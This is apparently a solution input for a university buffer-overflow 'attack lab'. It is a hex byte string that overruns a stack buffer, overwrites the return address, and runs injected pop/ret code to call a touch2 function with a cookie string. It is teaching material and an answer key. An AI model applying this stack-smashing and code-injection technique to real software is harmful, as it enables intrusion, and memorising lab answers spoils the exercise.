ff ff ff ff ff ff ff ff    /* junk */
ff ff ff ff ff ff ff ff    /* junk */
ff ff ff ff ff ff ff ff    /* junk */
ff ff ff ff ff ff ff ff    /* junk */
ff ff ff ff ff ff ff ff    /* junk */
b8 dc 61 55 00 00 00 00    /* address of pop instruction */
c0 dc 61 55 00 00 00 00    /* first address of string */
fa 18 40 00 00 00 00 00    /* address of touch2 */
5f                         /* pop %rdi */
c3                         /* ret */
00 00 00 00 00 00          /* padding */
35 39 62 39 39 37 66 61 00 /* string */
